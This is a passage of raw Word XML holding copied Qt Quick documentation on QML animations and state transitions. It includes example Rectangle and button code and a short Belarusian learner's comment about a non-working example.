          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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height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color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"red"</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8D4C56" w:rsidRDefault="0018577B" w:rsidP="0018577B">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SequentialAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on color </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="008D4C56" w:rsidRDefault="0018577B" w:rsidP="0018577B">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ColorAnimation</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to</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"yellow"</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duration</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1000</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18577B" w:rsidRPr="008D4C56" w:rsidRDefault="0018577B" w:rsidP="0018577B">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ColorAnimation</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to</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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duration</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1000</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18577B" w:rsidRPr="008D4C56" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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18577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Since the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2476" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SequentialAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object has been specified on the</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color</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property using the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Animation&gt; on &lt;Property&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax, its child</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2477" w:anchor="coloranimation" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ColorAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects are also automatically applied to this property and do not need to specify</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2478" w:anchor="target-prop" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>target</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2479" w:anchor="property-prop" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animation values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2101" w:name="qml-transition-animations"/>
      <w:bookmarkStart w:id="2102" w:name="transitions-during-state-changes"/>
      <w:bookmarkStart w:id="2103" w:name="_Toc483000985"/>
      <w:bookmarkStart w:id="2104" w:name="_Toc483003976"/>
      <w:bookmarkStart w:id="2105" w:name="_Toc483604327"/>
      <w:bookmarkStart w:id="2106" w:name="_Toc483605547"/>
      <w:bookmarkEnd w:id="2101"/>
      <w:bookmarkEnd w:id="2102"/>
      <w:r w:rsidRPr="009D50DC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transitions during State Changes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2103"/>
      <w:bookmarkEnd w:id="2104"/>
      <w:bookmarkEnd w:id="2105"/>
      <w:bookmarkEnd w:id="2106"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2480" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick States</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009C0F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="004E75DF">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property configurations</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where a property may have different values to reflect different states. </w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="004E75DF">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State changes</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduce </w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="004E75DF">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>abrupt</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> property changes; </w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="004E75DF">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animations</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="004E75DF">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smooth</w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> transitions to produce visually appealing state changes.</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The</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2481" w:anchor="transition" w:history="1">
        <w:r w:rsidRPr="009C0F4C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Transition</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0F4C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type can contain animation types to interpolate property changes caused by state changes</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. To assign the transition to an object, bind it to the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E75DF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="004E75DF" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A button might have two states, the</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pressed</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state when the user clicks on the button and a</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released</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state when the user releases the button. We can assign different property configurations for each state. A transition would animate the change from the</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pressed</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state to the</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released</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state. Likewise, there would be an animation during the change from the</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released</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state to the</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pressed</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state.</w:t>
      </w:r>
      <w:r w:rsidR="004E75DF" w:rsidRPr="004E75DF">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E75DF" w:rsidRPr="004E75DF">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example.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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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75</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height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75</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button</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state</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"RELEASED"</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MouseArea</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anchors</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fill</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parent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onPressed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button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state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"PRESSED"</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onReleased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button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state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"RELEASED"</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states</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State</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name</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"PRESSED"</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PropertyChanges</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target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button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color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"lightblue"</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lastRenderedPageBreak/>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State</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name</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"RELEASED"</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PropertyChanges</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target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button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color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"lightsteelblue"</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transitions</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Transition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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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"PRESSED"</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to</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"RELEASED"</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ColorAnimation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target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button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duration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Transition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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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"RELEASED"</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to</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"PRESSED"</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ColorAnimation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target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button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duration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r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="00230BC0"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18577B">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rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="00230BC0"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230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="00230BC0" w:rsidRDefault="0018577B" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00466618" w:rsidRPr="009C0F4C" w:rsidRDefault="009C0F4C" w:rsidP="0018577B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00466618" w:rsidRPr="00466618">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">У мяне </w:t>
      </w:r>
      <w:r w:rsidR="00466618" w:rsidRPr="002B551B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>падобны прыклад нешта не работае…</w:t>
      </w:r>
      <w:r w:rsidR="00466618" w:rsidRPr="002B551B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00466618" w:rsidRPr="002B551B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>іх код работае… а мой – не.</w:t>
      </w:r>
      <w:r w:rsidR="002B551B" w:rsidRPr="002B551B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> С ходу не разабраўся, чаму…</w:t>
      </w:r>
      <w:r w:rsidR="002B551B" w:rsidRPr="002B551B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B551B" w:rsidRPr="002B551B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">трэба было дадаць поле </w:t>
      </w:r>
      <w:r w:rsidR="002B551B" w:rsidRPr="002B551B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROPERTIES</w:t>
      </w:r>
      <w:r w:rsidR="002B551B" w:rsidRPr="002B551B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</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Binding the</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to</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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from</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">properties to the state's name will assign that particular transition to the state change. For simple or </w:t>
      </w:r>
      <w:r w:rsidRPr="00466618">
